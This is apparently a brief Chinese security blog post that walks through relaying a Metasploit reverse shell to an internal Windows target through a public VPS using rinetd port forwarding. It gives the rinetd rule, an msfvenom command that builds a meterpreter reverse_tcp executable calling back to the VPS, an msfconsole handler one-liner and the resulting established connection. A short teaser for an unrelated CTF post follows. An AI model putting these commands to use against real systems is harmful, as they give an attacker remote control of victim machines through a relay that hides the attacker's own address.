- 本地
metasploit
机器: 192.168.3.23
- 公网VPS: 181.122.37.15
- 内网靶机: 192.168.109.143
1 2 3
|
vim /etc/rinetd.conf 0.0.0.0 8022 127.0.0.1 8201 rinetd -c /etc/rinetd.conf
|
1 2 3
|
msfvenom -p windows/meterpreter/reverse_tcp LHOST=181.122.37.15 lport=8022 -f exe >181.122.37.15_8022.exe
msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set lhost 192.168.3.23;set lport 8201;run -j"
|
1
|
TCP 192.168.109.143:49776 181.122.37.15:8022 ESTABLISHED 3128
|
Source:wolvez.club | Author:wolvez
相关推荐: HITCON 2017 babyfirst-revenge(命令执行绕过四)
中午睡了一觉,醒来两点多了,发现几个群里又有人在黑我这个萌新菜比了…..然后用两个多小时ak了iscc放的题,这让我忍不住再次喷一波iscc…老子都ak了排名还5、60名…就因为昨天写红帽杯要交的wp没打….我真tm无语…算了算了不喷了。 开始今天的修炼! 在…
评论